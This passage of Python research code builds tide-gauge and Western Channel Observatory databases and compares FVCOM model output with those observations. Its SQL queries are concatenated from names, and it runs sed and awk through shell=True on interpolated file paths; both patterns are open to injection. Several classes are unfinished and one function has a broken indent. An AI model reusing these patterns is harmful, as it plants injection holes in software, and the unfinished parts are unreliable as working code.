            # Skip out if we don't have any coincident data (might simply be a sampling issue) within the model
            # period. We should interpolate here.
            if not np.any(current_gauge['dates_mod']) or not np.any(current_gauge['dates_obs']):
                continue
            current_gauge['r'], current_gauge['p'] = calculate_coefficient(current_gauge['rescale_zeta'][current_gauge['dates_mod']], current_gauge['rescale_gauge_obs'][current_gauge['dates_obs']])
            current_gauge['rms'] = rmse(current_gauge['rescale_zeta'][current_gauge['dates_mod']], current_gauge['rescale_gauge_obs'][current_gauge['dates_obs']])
            current_gauge['std'] = np.std(current_gauge['rescale_zeta'][current_gauge['dates_mod']] - current_gauge['rescale_gauge_obs'][current_gauge['dates_obs']])
            gauges_in_domain.append(gi)
            fvcom_nodes.append(river_index)
            name = gauge_names[gi]
            gauge_obs[name] = current_gauge
            del current_gauge
    tide_db.close_conn()  # tidy up after ourselves
    # Now make a figure of all that data.
    if len(gauge_obs) > 5:
        cols = np.ceil(len(gauge_obs) ** (1.0 / 3)).astype(int) + 1
    else:
        cols = 1
    rows = np.ceil(len(gauge_obs) / cols).astype(int)
    fig = plt.figure(figsize=figsize)
    # Bug fix: if no gauges matched, `time` was never assigned and the return
    # statement raised a NameError; initialise it so (None, {}) is returned.
    time = None
    for count, site in enumerate(sorted(gauge_obs)):
        ax = fig.add_subplot(rows, cols, count + 1)
        time = Time(fvcom, figure=fig, axes=ax, hold=True, **kwargs)
        time.plot_line(gauge_obs[site]['rescale_zeta'], label='Model', color='k')
        # We have to use the raw plot function for the gauge data as the plot_line function assumes we're using model
        # data.
        time.axes.plot(gauge_obs[site]['gauge_obs_clean']['times'], gauge_obs[site]['rescale_gauge_obs'], label='Gauge', color='m')
        # Should add the times of the flagged data here.
        time.axes.set_xlim(fvcom.time.datetime.min(), fvcom.time.datetime.max())
        time.axes.set_ylim(np.min((gauge_obs[site]['rescale_gauge_obs'].min(), gauge_obs[site]['rescale_zeta'].min())),
                           np.max((gauge_obs[site]['rescale_gauge_obs'].max(), gauge_obs[site]['rescale_zeta'].max())))
        time.axes.set_title(site)
    return time, gauge_obs
def _make_normal_tide_series(h_series):
height_series = h_series - np.mean(h_series)
return height_series
class db_tide(validation_db):
    """ Create a time series database and query it. """

    def make_bodc_tables(self):
        """ Make the complete set of empty tables for data to be inserted into (as defined in _add_sql_strings) """
        # Insert information into the error flags table
        self._add_sql_strings()
        for this_table, this_str in self.create_table_sql.items():
            self.execute_sql(this_str)
        error_data = [(0, '', 'No error'), (1, 'M', 'Improbable value flagged by QC'),
                      (2, 'N', 'Null Value'), (3, 'T', 'Value interpolated from adjacent values')]
        self.insert_into_table('error_flags', error_data)

    def insert_tide_file(self, file_list):
        """
        Add data from a set of files to the database.

        Parameters
        ----------
        file_list : list
            List of file names.
        """
        for this_file in file_list:
            print('Inserting data from file: ' + this_file)
            this_file_obj = bodc_annual_tide_file(this_file)
            try:
                site_id = self.select_qry('sites', "site_tla == '" + this_file_obj.site_tla + "'", 'site_id')[0][0]
            except (IndexError, TypeError):
                # Site not in the database yet: allocate the next free ID and
                # add a sites entry. (Indexing an empty result list raises
                # IndexError, a None result raises TypeError; the original
                # bare `except:` also hid genuine SQL errors.)
                try:
                    current_id_max = np.max(self.select_qry('sites', None, 'site_id'))
                    site_id = int(current_id_max + 1)
                except (ValueError, TypeError):
                    # Empty sites table (np.max raises ValueError on an empty
                    # sequence), so start the IDs from 1.
                    site_id = 1
                site_data = [(site_id, this_file_obj.site_tla, this_file_obj.site_name, this_file_obj.lon, this_file_obj.lat, '')]
                self.debug_data = site_data
                self.insert_into_table('sites', site_data)
            site_id_list = [site_id] * len(this_file_obj.seconds_from_ref)
            table_data = list(zip(site_id_list, this_file_obj.seconds_from_ref, this_file_obj.elevation_data,
                                  this_file_obj.elevation_flag, this_file_obj.residual_data, this_file_obj.residual_flag))
            self.insert_into_table('gauge_obs', table_data)

    def get_tidal_series(self, station_identifier, start_date_dt=None, end_date_dt=None):
        """
        Extract a time series of tidal elevations for a given station.

        Parameters
        ----------
        station_identifier : str
            Database station identifier.
        start_date_dt, end_date_dt : datetime.datetime, optional
            Give start and/or end times to extract from the database. If omitted, all data are returned.

        Returns
        -------
        dates : np.ndarray
            Array of datetime objects.
        data : np.ndarray
            Surface elevation and residuals from the database for the given station.
        """
        select_str = "time_int, elevation, elevation_flag"
        table_name = "gauge_obs as go"
        inner_join_str = "sites as st on st.site_id = go.site_id"
        # Accept either a three-letter acronym (string) or a numeric site ID.
        if isinstance(station_identifier, str):
            where_str = "st.site_tla = '" + station_identifier + "'"
        else:
            where_str = "st.site_id = " + str(int(station_identifier))
        if start_date_dt is not None:
            start_sec = dt_to_epochsec(start_date_dt)
            where_str += " and go.time_int >= " + str(start_sec)
        if end_date_dt is not None:
            end_sec = dt_to_epochsec(end_date_dt)
            where_str += " and go.time_int <= " + str(end_sec)
        order_by_str = 'go.time_int'
        return_data = self.select_qry(table_name, where_str, select_str, order_by_str, inner_join_str)
        if not return_data:
            print('No data available')
            dates, data = None, None
        else:
            return_data = np.asarray(return_data)
            date_list = [epochsec_to_dt(this_time) for this_time in return_data[:, 0]]
            dates, data = np.asarray(date_list), return_data[:, 1:]
        return dates, data

    def get_gauge_locations(self, long_names=False):
        """
        Extract locations and names of the tide gauges from the database.

        Parameters
        ----------
        long_names : bool, optional
            If True, return the 'nice' long names rather than the station identifiers.

        Returns
        -------
        tla_name : np.ndarray
            List of tide gauge names.
        lon_lat : np.ndarray
            Positions of the gauges.
        """
        gauge_site_data = np.asarray(self.select_qry('sites', None))
        # Column 2 is the long site name, column 1 the three-letter acronym.
        if long_names:
            tla_name = gauge_site_data[:, 2]
        else:
            tla_name = gauge_site_data[:, 1]
        lon_lat = np.asarray(gauge_site_data[:, 3:5], dtype=float)
        return tla_name, lon_lat

    def get_nearest_gauge_id(self, lon, lat, threshold=np.inf):
        """
        Get the ID of the gauge closest to the position given by `lon' and `lat'.

        Parameters
        ----------
        lon, lat : float
            Position for which to search for the nearest tide gauge.
        threshold : float, optional
            Threshold distance in metres (inclusive) within which gauges must be from the given position. If no
            gauges are found within this distance, the gauge ID is None.

        Returns
        -------
        closest_gauge_id : int
            Database ID for the gauge closest to `lon' and `lat'.
        min_dist : float
            Distance in metres between `lon' and `lat' and the gauge.
        """
        sites_lat_lon = np.asarray(self.select_qry('sites', None, 'site_id, lat, lon'))
        min_dist = np.inf
        closest_gauge_id = None
        # Linear scan over all sites for the smallest great-circle distance.
        for this_row in sites_lat_lon:
            this_dist = vincenty_distance([lat, lon], [this_row[1], this_row[2]])
            if this_dist < min_dist:
                min_dist = this_dist
                closest_gauge_id = this_row[0]
        if min_dist >= threshold:
            closest_gauge_id = None
        else:
            closest_gauge_id = int(closest_gauge_id)
        return closest_gauge_id, min_dist

    def _add_sql_strings(self):
        """ Function to define the database structure. """
        bodc_tables = {'gauge_obs': ['site_id integer NOT NULL', 'time_int integer NOT NULL',
                                     'elevation real NOT NULL', 'elevation_flag integer', 'residual real', 'residual_flag integer',
                                     'PRIMARY KEY (site_id, time_int)', 'FOREIGN KEY (site_id) REFERENCES sites(site_id)',
                                     'FOREIGN KEY (elevation_flag) REFERENCES error_flags(flag_id)',
                                     'FOREIGN KEY (residual_flag) REFERENCES error_flags(flag_id)'],
                       'sites': ['site_id integer NOT NULL', 'site_tla text NOT NULL', 'site_name text', 'lon real', 'lat real',
                                 'other_stuff text', 'PRIMARY KEY (site_id)'],
                       'error_flags': ['flag_id integer NOT NULL', 'flag_code text', 'flag_description text']}
        for this_key, this_val in bodc_tables.items():
            self.make_create_table_sql(this_key, this_val)
class bodc_annual_tide_file():
    """
    Parse an annual BODC tide gauge file.

    Assumptions: file name of the form yearTLA.txt (the three-letter site
    acronym is taken from characters 4-7 of the file name).
    """
    def __init__(self, file_name, header_length=11):
        """
        Read the header for the site metadata, then parse the data rows into
        epoch seconds, elevations and residuals (each with a QC flag).

        Parameters
        ----------
        file_name : str
            Path to the BODC annual tide file.
        header_length : int, optional
            Number of header lines preceding the data (default 11).
        """
        bodc_annual_tide_file._clean_tide_file(file_name, header_length)
        with open(file_name) as f:
            header_lines = [next(f) for this_line in range(header_length)]
        # Pull the site position and name out of the header; the partial
        # 'ongitude'/'atitude' matches tolerate either initial-letter case.
        for this_line in header_lines:
            if 'ongitude' in this_line:
                self.lon = [float(s) for s in this_line.split() if bodc_annual_tide_file._is_number(s)][0]
            if 'atitude' in this_line:
                self.lat = [float(s) for s in this_line.split() if bodc_annual_tide_file._is_number(s)][0]
            if 'Site' in this_line:
                site_str_raw = this_line.split()[1:]
                if len(site_str_raw) == 1:
                    site_str = site_str_raw[0]
                else:
                    # Multi-word site names are concatenated without spaces.
                    site_str = ''
                    for this_str in site_str_raw:
                        site_str += this_str
                self.site_name = site_str
        self.site_tla = file_name.split('/')[-1][4:7]
        raw_data = np.loadtxt(file_name, skiprows=header_length, dtype=bytes).astype(str)
        # Columns 1 and 2 hold the date and time; convert to epoch seconds.
        seconds_from_ref = []
        for this_row in raw_data:
            this_dt_str = this_row[1] + ' ' + this_row[2]
            this_seconds_from_ref = dt_to_epochsec(dt.datetime.strptime(this_dt_str, '%Y/%m/%d %H:%M:%S'))
            seconds_from_ref.append(int(this_seconds_from_ref))
        self.seconds_from_ref = seconds_from_ref
        # Columns 3 and 4 hold the elevation and residual, each optionally
        # suffixed with a QC flag letter.
        elevation_data = []
        elevation_flag = []
        residual_data = []
        residual_flag = []
        for this_row in raw_data:
            meas, error_code = bodc_annual_tide_file._parse_tide_obs(this_row[3])
            elevation_data.append(meas)
            elevation_flag.append(error_code)
            meas, error_code = bodc_annual_tide_file._parse_tide_obs(this_row[4])
            residual_data.append(meas)
            residual_flag.append(error_code)
        self.elevation_data = elevation_data
        self.elevation_flag = elevation_flag
        self.residual_data = residual_data
        self.residual_flag = residual_flag

    @staticmethod
    def _parse_tide_obs(in_str):
        """
        Parse a single observation string into (value, error_code).

        Values may carry a trailing QC letter (M/N/T) which is mapped onto the
        integer codes used by the error_flags table; unflagged values get
        error code 0.
        """
        error_code_dict = {'M': 1, 'N': 2, 'T': 3}
        try:
            # If the last character is a digit there is no QC flag.
            int(in_str[-1])
            error_code = 0
            meas = float(in_str)
        except ValueError:
            # Trailing QC letter: strip it and look up its code. (The
            # original bare `except:` also swallowed unrelated errors.)
            error_code_str = in_str[-1]
            meas = float(in_str[0:-1])
            try:
                error_code = error_code_dict[error_code_str]
            except KeyError:
                # NOTE(review): returning None here makes the caller's tuple
                # unpacking raise TypeError; kept for backwards compatibility,
                # but raising ValueError would be clearer.
                print('Unrecognised error code')
                return
        return meas, error_code

    @staticmethod
    def _is_number(s):
        """ Return True if `s` parses as a float. """
        try:
            float(s)
            return True
        except ValueError:
            return False

    @staticmethod
    def _clean_tide_file(file_name, header_length):
        """
        Strip non-data lines after the header, in place, using sed.

        NOTE(review): this interpolates `file_name` into a shell command run
        with shell=True, so it must never be called with untrusted paths, and
        it only works where sed is available.
        """
        sed_str = "sed -i '"+ str(header_length + 1) + ",$ {/^ *[0-9]/!d}' " + file_name
        sp.call([sed_str], shell=True)
#################################################################################################################
"""
Validation against L4 and E1 CTD and buoy data
observations_meta_data = {'buoy_name':'E1', 'year':'2006', 'ctd_new_file_type': False,
'ctd_datadir':'/data/euryale4/backup/mbe/Data/WCO_data/E1/CTD_data/2006',
'buoy_filepath':None, 'lon':-4.368, 'lat':50.035}
observations_meta_data = {'buoy_name':'L4', 'year':'2015', 'ctd_new_file_type': True, 'ctd_filepath':'./data/e1_data_2015.txt',
'buoy_filepath': , '/data/euryale4/backup/mbe/Data/WCO_data/L4/Buoy_data/l4_cont_data_2015.txt', 'lon':-4.217, 'lat':50.250}
model_filestr_lambda = lambda m: '/data/euryale4/backup/mbe/Models/FVCOM/tamar_v2/run/output/depth_tweak2/2006/{:02d}/tamar_v2_0001.nc'.format(m)
available_months = np.arange(1,13)
model_file_list = [model_filestr_lambda(this_month) for this_month in available_months]
"""
class db_wco(validation_db):
    """ Work with an SQL database of data from PML's Western Channel Observatory. """

    def make_wco_tables(self):
        """
        Make the complete set of empty tables for data to be inserted into (as defined in _add_sql_strings).
        """
        # Create every table defined by _add_sql_strings, then seed the static
        # lookup tables (sites and measurement types) and index the times.
        self._add_sql_strings()
        for this_str in self.create_table_sql.values():
            self.execute_sql(this_str)
        sites_data = [(0, 'L4',-4.217,50.250, ' '), (1, 'E1',-4.368,50.035,' ')]
        self.insert_into_table('sites', sites_data)
        measurement_type_data = [(0,'CTD measurements'), (1, 'Surface buoy measurements')]
        self.insert_into_table('measurement_types', measurement_type_data)
        self.execute_sql('create index date_index on obs (time_int);')

    def _add_sql_strings(self):
        """ Define the WCO database schema (obs, sites and measurement_types tables). """
        wco_tables = {'obs':['buoy_id integer NOT NULL', 'time_int integer NOT NULL',
                             'depth real NOT NULL', 'temp real', 'salinity real', 'measurement_flag integer NOT NULL',
                             'PRIMARY KEY (buoy_id, depth, measurement_flag, time_int)', 'FOREIGN KEY (buoy_id) REFERENCES sites(buoy_id)',
                             'FOREIGN KEY (measurement_flag) REFERENCES measurement_types(measurement_flag)'],
                      'sites':['buoy_id integer NOT NULL', 'buoy_name text', 'lon real', 'lat real',
                               'other_stuff text', 'PRIMARY KEY (buoy_id)'],
                      'measurement_types':['measurement_flag integer NOT NULL', 'measurement_description text', 'PRIMARY KEY (measurement_flag)']}
        for table_name, column_list in wco_tables.items():
            self.make_create_table_sql(table_name, column_list)

    def insert_CTD_file(self, filestr, buoy_id):
        """ Add a single CTD file to the obs table (measurement type 0). """
        self._insert_obs(WCO_obs_file(filestr), buoy_id, 0.0)

    def insert_buoy_file(self, filestr, buoy_id):
        """ Add a single surface buoy file to the obs table (measurement type 1, depth 0). """
        self._insert_obs(WCO_obs_file(filestr, depth=0), buoy_id, 1.0)

    def insert_CTD_dir(self, dirstr, buoy_id):
        """ Add a whole directory of CTD files to the obs table (measurement type 0). """
        self._insert_obs(CTD_dir(dirstr), buoy_id, 0.0)

    def _insert_obs(self, file_obj, buoy_id, measurement_id):
        """ Insert the observations held by `file_obj` for the given buoy and measurement type. """
        obs = file_obj.observation_dict
        epoch_sec_timelist = [dt_to_epochsec(this_time) for this_time in obs['dt_time']]
        n_obs = len(epoch_sec_timelist)
        table_data = list(zip(np.tile(buoy_id, n_obs), epoch_sec_timelist, obs['depth'], obs['temp'],
                              obs['salinity'], np.tile(measurement_id, n_obs)))
        self.insert_into_table('obs', table_data)

    def get_observations(self, buoy_name, start_date_dt=None, end_date_dt=None, measurement_id=None):
        """
        Extract a time series of observations for the named buoy, optionally
        limited to a start and/or end datetime.

        Returns (dates, data), where data columns are depth, temp and
        salinity, or (None, None) when nothing matches the query.
        """
        where_parts = ["st.buoy_name = '" + buoy_name + "'"]
        if start_date_dt is not None:
            where_parts.append('go.time_int >= ' + str(dt_to_epochsec(start_date_dt)))
        if end_date_dt is not None:
            where_parts.append('go.time_int <= ' + str(dt_to_epochsec(end_date_dt)))
        return_data = self.select_qry('obs as go', ' and '.join(where_parts), 'time_int, depth, temp, salinity',
                                      'go.time_int, go.depth', 'sites as st on st.buoy_id = go.buoy_id')
        if not return_data:
            print('No data available')
            return None, None
        return_data = np.asarray(return_data)
        dates = np.asarray([epochsec_to_dt(this_time) for this_time in return_data[:, 0]])
        return dates, return_data[:, 1:]
class WCO_obs_file():
    """
    Parse a single Western Channel Observatory observation file (CTD cast or
    surface buoy record) into a dictionary of numpy arrays.

    NOTE(review): parsing shells out to `sed` and `awk` and writes temporary
    files into the current working directory, so this only works where those
    tools are available and the working directory is writable.
    """
    def __init__(self, filename, depth=None):
        # `depth` is used for surface buoy files which carry no depth column:
        # a constant depth is tiled to the length of the time series.
        self._setup_possible_vars()
        self.observation_dict = self._add_file(filename)
        if depth is not None:
            self.observation_dict['depth'] = np.tile(depth, len(self.observation_dict['dt_time']))

    def _add_file(self,filename,remove_undated=True):
        """ Split a (possibly multi-record) file into parts, parse each part and concatenate the results. """
        # remove duff lines
        sed_str = "sed '/^-9.990e/d' " + filename + " > temp_file.txt"
        sp.call(sed_str, shell=True)
        # some files have multiple records of differing types...helpful
        temp_str = 'YKA123ASD'
        file_split_str = '''awk '/^[^0-9]/{g++} { print $0 > "''' + temp_str + '''"g".txt"}' temp_file.txt'''
        sp.call(file_split_str, shell=True)
        temp_file_list = gb.glob(temp_str + '*')
        obs_dict_list = []
        for this_file in temp_file_list:
            this_obs = self._add_file_part(this_file)
            # Optionally drop parts for which no date information was parsed.
            if not remove_undated or 'dt_time' in this_obs:
                obs_dict_list.append(this_obs)
        rm_file = [os.remove(this_file) for this_file in temp_file_list]
        # Concatenate the per-part arrays key by key. NOTE(review): the keys
        # are taken from the first surviving part, so this assumes all parts
        # share the same keys and that at least one part survived -- confirm.
        return {this_key:np.hstack([this_dict[this_key] for this_dict in obs_dict_list]) for this_key in obs_dict_list[0]}

    def _add_file_part(self, filename):
        """ Parse one homogeneous record: detect the delimiter, then map header columns onto known variables. """
        # seperate header and clean out non numeric lines
        head_str ="head -1 " + filename + " > temp_header_file.txt"
        sed_str = "sed '/^[!0-9]/!d' " + filename + " > temp_file.txt"
        sp.call(head_str, shell=True)
        sp.call(sed_str, shell=True)
        # Load the files, some use semi-colon delimiters, some whitespace...
        # (The bogus 'no_delimination_needed' delimiter forces np.loadtxt to
        # return each header line as a single string for inspection.)
        if ';' in str(np.loadtxt('temp_header_file.txt', delimiter='no_delimination_needed', dtype=str)):
            observations_raw = np.loadtxt('temp_file.txt', delimiter=';',dtype=str)
            observations_header = np.loadtxt('temp_header_file.txt', delimiter=';',dtype=str)
        elif ',' in str(np.loadtxt('temp_header_file.txt', delimiter='no_delimination_needed', dtype=str)):
            observations_raw = np.loadtxt('temp_file.txt', delimiter=',',dtype=str)
            observations_header = np.loadtxt('temp_header_file.txt', delimiter=',',dtype=str)
        else:
            observations_raw = np.loadtxt('temp_file.txt', dtype=str)
            observations_header = np.loadtxt('temp_header_file.txt', dtype=str)
        # Clean up temp files
        os.remove('temp_file.txt')
        os.remove('temp_header_file.txt')
        # Find the relevant columns and pull out temp, salinity, date, etc if available
        observation_dict = {}
        time_vars = []
        for this_var, this_possible in self.possible_vars.items():
            if np.any(np.isin(this_possible, observations_header)):
                this_col = np.where(np.isin(observations_header, this_possible))[0]
                # Date/time columns stay as strings for later parsing; all
                # other variables are converted to floats.
                if this_var == 'time' or this_var =='date' or this_var=='Jd':
                    observation_dict[this_var] = np.squeeze(np.asarray(observations_raw[:,this_col], dtype=str))
                    time_vars.append(this_possible[np.isin(this_possible, observations_header)])
                else:
                    observation_dict[this_var] = np.squeeze(np.asarray(observations_raw[:,this_col], dtype=float))
        if 'date' in observation_dict:
            observation_dict['dt_time'] = self._parse_dates_to_dt(observation_dict, time_vars)
        return observation_dict

    def _setup_possible_vars(self):
        """ Map canonical variable names onto the header spellings seen across WCO file formats. """
        self.possible_vars = {'temp':np.asarray(['Tv290C', 'SST', ' Mean SST (degC)']), 'salinity':np.asarray(['Sal00', 'Sal', ' Mean SST (degC)']),
                              'depth':np.asarray(['DepSM']), 'date':np.asarray(['mm/dd/yyyy', 'Year', ' Date (YYMMDD)']),
                              'julian_day':np.asarray(['Jd']), 'time':np.asarray(['hh:mm:ss', 'Time', ' Time (HHMMSS)'])}

    @staticmethod
    def _parse_dates_to_dt(obs_dict, time_vars):
        """ Convert the raw date/time string columns to datetime objects, format depending on which headers were found. """
        dt_list = []
        if np.any(np.isin('mm/dd/yyyy', time_vars)):
            # US-style date plus HH:MM:SS time columns.
            for this_time, this_date in zip(obs_dict['time'], obs_dict['date']):
                dt_list.append(dt.datetime.strptime(this_date + ' ' + this_time, '%m/%d/%Y %H:%M:%S'))
        elif np.any(np.isin('Year', time_vars)):
            # Year + Julian day columns with a fractional 'HH.MM' style time.
            for this_time, (this_jd, this_year) in zip(obs_dict['time'], zip(obs_dict['julian_day'], obs_dict['date'])):
                dt_list.append(dt.datetime(int(this_year),1,1) + dt.timedelta(days=int(this_jd) -1) +
                               dt.timedelta(hours=int(this_time.split('.')[0])) + dt.timedelta(minutes=int(this_time.split('.')[1])))
        elif np.any(np.isin(' Date (YYMMDD)', time_vars)):
            # Compact YYMMDD / HHMMSS columns.
            for this_time, this_date in zip(obs_dict['time'], obs_dict['date']):
                dt_list.append(dt.datetime.strptime(this_date + ' ' + this_time, '%y%m%d %H%M%S'))
        else:
            print('Date parser not up to date with possible vars')
            dt_list = None
        return np.asarray(dt_list)
class CTD_dir(WCO_obs_file):
    """
    Load a directory of WCO CTD files into a single observation dictionary.

    Assumes each file name starts with a YYMMDD date (e.g. '150623...') and
    time-stamps all casts at midday.
    """
    def __init__(self, dirname):
        all_files = os.listdir(dirname)
        dt_list = []
        observation_dict_list = []
        self._setup_possible_vars()
        for this_file in all_files:
            print('Processing file {}'.format(this_file))
            try:
                # Parse the date from the file name and the file contents into
                # temporaries first. Bug fix: the original appended the file's
                # data before the date parse, so a bad file name left an entry
                # in observation_dict_list with no matching dates and the data
                # and time arrays fell out of step.
                date_str = '20' + this_file[0:2] + '-' + this_file[2:4] + '-' + this_file[4:6]
                this_dt = dt.datetime.strptime(date_str, '%Y-%m-%d') + dt.timedelta(hours=12)
                this_obs = self._add_file(os.path.join(dirname, this_file), remove_undated=False)
            except ValueError:
                print('Error in file {}'.format(this_file))
                continue
            observation_dict_list.append(this_obs)
            dt_list.append(np.tile(this_dt, len(this_obs['temp'])))
        # Flatten the list of dictionaries to one dictionary
        self.observation_dict = {this_key: np.hstack([this_dict[this_key] for this_dict in observation_dict_list]) for this_key in observation_dict_list[0]}
        self.observation_dict['dt_time'] = np.hstack(dt_list)
"""
Do the comparison
"""
class comp_data():
    """
    Base class for comparing model output with WCO observations.

    NOTE(review): parts of this class and its subclasses look unfinished;
    several methods reference names which are never defined in scope. The
    mechanical errors which could be fixed without guessing at intent have
    been fixed, the rest are flagged inline.
    """
    def __init__(self, buoy_list, file_list_or_probe_dir, wco_database, max_time_threshold=dt.timedelta(hours=1), max_depth_threshold = 100, probe_depths=None):
        # Bug fix: the original read `self.file_list_or_probe_dir` without
        # ever assigning it (an immediate AttributeError); store the argument.
        self.file_list_or_probe_dir = file_list_or_probe_dir
        self.database_obj = wco_database
        self.buoy_list = buoy_list
        self.model_data = {}
        if probe_depths is not None:
            for this_ind, this_buoy in enumerate(buoy_list):
                # Bug fix: the original indexed into a not-yet-existing
                # per-buoy dict (KeyError); create the entry instead.
                self.model_data[this_buoy] = {'depth': probe_depths[this_ind]}
        self.observations = {}
        for this_buoy in self.buoy_list:
            self.observations[this_buoy] = {}

    def retrieve_file_data(self):
        """ Overridden in subclasses to load the model data. """
        pass

    def retrieve_obs_data(self, buoy_name, var, measurement_type=None):
        """ Fetch observations for one buoy/variable over the model period from the database. """
        # Bug fix: hasattr requires (object, attribute-name-string).
        if not hasattr(self, 'model_date_mm'):
            print('Retrieve model data first')
            return
        obs_dt, obs_raw = self.database_obj.get_obs_data(buoy_name, var, self.model_date_mm[0], self.model_date_mm[1], measurement_type)
        obs_depth = obs_raw[:, 0]
        obs_var = obs_raw[:, 1]
        # NOTE(review): `obs_dict` was never defined in the original; this
        # assumed structure (times, depths and values) needs confirming.
        obs_dict = {'dt_time': obs_dt, 'depth': obs_depth, var: obs_var}
        self.observations[buoy_name][var] = obs_dict

    def get_comp_data_interpolated(self, buoy_name, var_list):
        """
        Interpolate model output onto observation depths, day by day.

        NOTE(review): this method looks unfinished -- `observations`,
        `model_time_mm`, `fvcom_data_reader`, `model_depths`, `this_comp`,
        `this_time_close` and `max_obs_depth` are never defined in this
        scope. Only the mechanical errors (hasattr call, stray statement,
        mismatched loop variable) have been fixed.
        """
        # Bug fix: hasattr takes the attribute name as a string.
        if not hasattr(self, 'comp_dict'):
            self.comp_dict = {}
        obs_dates = np.unique([this_date.date() for this_date in observations['time']])
        obs_comp = {}
        for this_ind, this_obs_date in enumerate(obs_dates):
            if this_obs_date >= model_time_mm[0].date() and this_obs_date <= model_time_mm[1].date():
                this_obs_choose = [this_time.date() == this_obs_date for this_time in self.observations[buoy_name]['dt_time']]
                # Bug fix: the loop variable was named this_obs_time while the
                # body compared this_obs_date; a stray bare `t` statement has
                # also been removed here.
                this_time_before, this_time_after = self.model_closest_both_times(this_obs_date)
                this_obs_deps = self.observations[buoy_name]['depth'][this_obs_choose]
                for var in var_list:
                    this_obs = self.observations[buoy_name][var][this_obs_choose]
                    this_model = np.squeeze(fvcom_data_reader.data.temp[this_time_close, ...])
                    this_model_interp = np.squeeze(np.interp(this_obs_deps, model_depths, this_model))
                    try:
                        obs_comp[var].append(this_comp)
                    except KeyError:
                        obs_comp[var] = this_comp
                    max_obs_depth.append(np.max(this_obs_deps))
        self.comp_dict[buoy_name] = obs_comp

    def comp_data_nearest(self, buoy_name, var_list):
        """ Placeholder for a nearest-neighbour (non-interpolated) comparison. """
        pass

    def model_closest_time(self, find_time):
        # NOTE(review): stub; the original was also defined without `self`.
        pass
class comp_data_filereader(comp_data):
    """
    comp_data variant which reads model data directly from FVCOM output files.

    NOTE(review): this class appears unfinished; several statements are
    incomplete (flagged inline) and it will not run as written.
    """
    def retrieve_file_data(self):
        # Build an SQL 'in (...)' clause from the buoy names.
        # NOTE(review): the names are not quoted, so the resulting SQL is
        # probably invalid; also `self.wco_database` and `select_query` do not
        # match the attribute (`database_obj`) and method (`select_qry`)
        # names used elsewhere in this module -- confirm.
        where_str = 'buoy_name in ('
        for this_buoy in self.buoy_list:
            where_str+=this_buoy + ','
        where_str = where_str[0:-1] + ')'
        buoy_lat_lons = self.wco_database.select_query('sites', where_str, 'buoy_name, lon, lat')
        first_file = True
        model_all_dicts = {}
        # NOTE(review): `self.file_list` is never set by comp_data.__init__
        # (which stores `file_list_or_probe_dir`) -- confirm.
        for this_file in self.file_list:
            if first_file:
                fvcom_data_reader = FileReader(this_file, ['temp', 'salinity'])
                close_node = []
                for this_buoy_ll in buoy_lat_lons:
                    # NOTE(review): append() is called with no argument; the
                    # nearest-node lookup is missing here.
                    close_node.append()
                # Convert sigma layers to depths (positive down).
                model_depths = fvcom_data_reader.grid.siglay * fvcom_data_reader.grid.h * -1
                for this_buoy in self.buoy_list:
                    # NOTE(review): mod_times / mod_t_vals / mod_s_vals are
                    # never defined in this scope.
                    model_all_dicts[this_buoy] = {'dt_time': mod_times, 'temp': mod_t_vals, 'salinity': mod_s_vals}
                first_file = False
            else:
                fvcom_data_reader = FileReader(this_file, ['temp', 'salinity'], dims={'node':[close_node]})
                for this_buoy in self.buoy_list:
                    # NOTE(review): bare expression with no effect; the
                    # accumulation of subsequent files' data is missing.
                    model_all_dicts
        model_depths = fvcom_data_reader.grid.siglay * fvcom_data_reader.grid.h * -1
        for this_buoy in self.buoy_list:
            # NOTE(review): `model_dp` is never defined.
            model_all_dicts[this_buoy]['depth'] = model_dp
        for this_buoy in self.buoy_list:
            self.model_data[this_buoy] = model_all_dicts[this_buoy]

    def model_closest_time(self, find_time):
        # NOTE(review): stub -- `closest_time` is never computed.
        return closest_time
class comp_data_probe(comp_data):
    """ comp_data variant which loads model data from FVCOM probe files. """
    def retrieve_file_data(self):
        """
        Read temperature and salinity probe files for every buoy into
        self.model_data.

        Bug fix: this method was defined without `self` even though it uses
        instance attributes throughout.
        """
        for this_buoy in self.buoy_list:
            t_filelist = []
            s_filelist = []
            # NOTE(review): `self.file_or_probe_dir_list` does not match the
            # attribute set in comp_data.__init__ (`file_list_or_probe_dir`);
            # confirm which name is intended.
            for this_dir in self.file_or_probe_dir_list:
                t_filelist.append(this_dir + this_buoy + '_t1.dat')
                s_filelist.append(this_dir + this_buoy + '_s1.dat')
            mod_times, mod_t_vals, mod_pos = pf.read.read_probes(t_filelist, locations=True, datetimes=True)
            # NOTE(review): this second call overwrites mod_times; assumes the
            # temperature and salinity probe files share timestamps -- confirm.
            mod_times, mod_s_vals, mod_pos = pf.read.read_probes(s_filelist, locations=True, datetimes=True)
            model_dict = {'dt_time': mod_times, 'temp': mod_t_vals, 'salinity': mod_s_vals}
            self.model_data[this_buoy] = model_dict
def wco_model_comparison(model_file_list, obs_database_file):
    """
    Compare FVCOM model output with WCO CTD and buoy observations.

    NOTE(review): this function appears unfinished -- `observations`,
    `model_time_mm`, `fvcom_data_reader`, `model_depths`, `obs_meta_data` and
    `get_buoy_obs` are all undefined in this scope, and the arguments
    `model_file_list` / `obs_database_file` are never used. Flagged rather
    than changed because the intended data flow cannot be inferred from this
    file alone.
    """
    temp_comp = []
    sal_comp = []
    dates_comp = []
    max_obs_depth = []
    # Compare the CTD casts day by day within the model period.
    obs_dates = np.unique([this_date.date() for this_date in observations['time']])
    for this_ind, this_obs_date in enumerate(obs_dates):
        if this_obs_date >= model_time_mm[0].date() and this_obs_date <= model_time_mm[1].date():
            this_obs_choose = [this_time.date() == this_obs_date for this_time in observations['time']]
            this_obs_time = np.min(observations['time'][this_obs_choose])
            this_time_close = fvcom_data_reader.closest_time(this_obs_time)
            this_obs_deps = observations['h'][this_obs_choose]
            this_obs_temp = observations['temp'][this_obs_choose]
            this_obs_salinity = observations['salinity'][this_obs_choose]
            # Interpolate the observed profile onto the model depths so the
            # two can be compared level by level.
            this_obs_temp_interp = np.squeeze(np.interp(model_depths, this_obs_deps, this_obs_temp))
            this_obs_salinity_interp = np.squeeze(np.interp(model_depths, this_obs_deps, this_obs_salinity))
            this_model_temp = np.squeeze(fvcom_data_reader.data.temp[this_time_close,...])
            this_model_salinity = np.squeeze(fvcom_data_reader.data.salinity[this_time_close,...])
            temp_comp.append(np.asarray([this_obs_temp_interp, this_model_temp]))
            sal_comp.append(np.asarray([this_obs_salinity_interp, this_model_salinity]))
            dates_comp.append(this_obs_time)
            max_obs_depth.append(np.max(this_obs_deps))
